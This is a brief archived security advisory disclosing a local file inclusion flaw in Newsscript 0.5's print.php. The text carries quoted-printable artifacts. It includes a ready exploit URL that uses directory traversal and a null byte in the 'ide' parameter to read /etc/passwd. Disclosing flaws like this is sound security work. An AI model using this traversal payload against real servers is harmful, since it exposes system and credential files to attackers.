AOH :: HP Unsorted N :: B06-4670.HTM

Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability



Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability
Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability



# Subject:=0D
=0D
--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "=0D
=0D
# Vulnerable version:=0D
=0D
--- "Newsscript version 0.5"=0D
=0D
=0D
=0D
# Vendor URL:=0D
=0D
--- Emaill - mail@webmaster-journal.com=0D 
--- Website - http://webmaster-journal.com=0D 
=0D
=0D
=0D
# Available in:=0D
=0D
---http://www.comscripts.com/scripts/php.wm-news.203.html=0D 
=0D
=0D
=0D
# Vulnerability:=0D
=0D
--- Vulnerable code in print/print.php=0D
=0D
--- $ide var is not sanitized and can be used to include files from local resources=0D
=0D
--- 1	    =0D
--- 2	    =0D
--- 3	    =0D
--- =0D
---=0D
--- 27	     include($file_name);=0D
=0D
=0D
=0D
# Exploit:=0D
=0D
--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00=0D 
=0D
=0D
=0D
# Discovered By:=0D
=0D
--- Daftrix[at]Gmail.com=0D
--- Daftrix Security Investigations=0D
--- http://www.daftrix.com 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.